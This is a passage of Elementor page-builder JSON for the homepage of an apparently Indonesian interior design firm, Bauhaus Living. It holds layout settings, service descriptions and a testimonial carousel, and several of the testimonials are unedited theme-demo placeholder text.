ask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\